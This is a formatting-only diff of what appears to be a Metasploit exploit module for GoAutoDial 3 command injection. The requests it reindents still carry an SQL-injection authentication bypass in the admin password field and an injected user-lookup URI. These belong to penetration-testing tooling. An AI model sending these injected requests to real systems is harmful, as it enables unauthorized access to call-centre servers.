diff --git a/modules/exploits/linux/http/goautodial_3_rce_command_injection.rb b/modules/exploits/linux/http/goautodial_3_rce_command_injection.rb index 3e354e58b1..3702eff3c7 100644 --- a/modules/exploits/linux/http/goautodial_3_rce_command_injection.rb +++ b/modules/exploits/linux/http/goautodial_3_rce_command_injection.rb @@ -54,12 +54,12 @@ class MetasploitModule < Msf::Exploit::Remote uri = target_uri.path send_request_cgi({ - 'method' => 'GET', - 'uri' => normalize_uri(uri, 'changelog.txt'), - 'headers' => { - 'User-Agent' => 'Mozilla/5.0', - 'Accept-Encoding' => 'identity' - } + 'method' => 'GET', + 'uri' => normalize_uri(uri, 'changelog.txt'), + 'headers' => { + 'User-Agent' => 'Mozilla/5.0', + 'Accept-Encoding' => 'identity' + } }) end @@ -69,16 +69,14 @@ class MetasploitModule < Msf::Exploit::Remote send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, 'index.php', 'go_login', 'validate_credentials'), - 'headers' => - { + 'headers' => { 'User-Agent' => 'Mozilla/5.0', 'Accept-Encoding' => 'identity' - }, - 'vars_post' => - { + }, + 'vars_post' => { 'user_name' => 'admin', 'user_pass' => '\'%20or%20\'1\'%3D\'1' - } + } }) end @@ -88,13 +86,12 @@ class MetasploitModule < Msf::Exploit::Remote send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, 'index.php', 'go_site', 'go_get_user_info', '\'%20OR%20active=\'Y'), - 'headers' => - { + 'headers' => { 'User-Agent' => 'Mozilla/5.0', 'Accept-Encoding' => 'identity', 'Cookie' => cookies - } - }) + } + }) end # @@ -110,13 +107,11 @@ class MetasploitModule < Msf::Exploit::Remote 'method' => 'GET', 'uri' => normalize_uri(uri, 'index.php', 'go_site', 'cpanel', params), 'headers' => { - 'User-Agent' => 'Mozilla/5.0', - 'Accept-Encoding' => 'identity', - 'Cookie' => @cookie - + 'User-Agent' => 'Mozilla/5.0', + 'Accept-Encoding' => 'identity', + 'Cookie' => @cookie } - }) - + }) end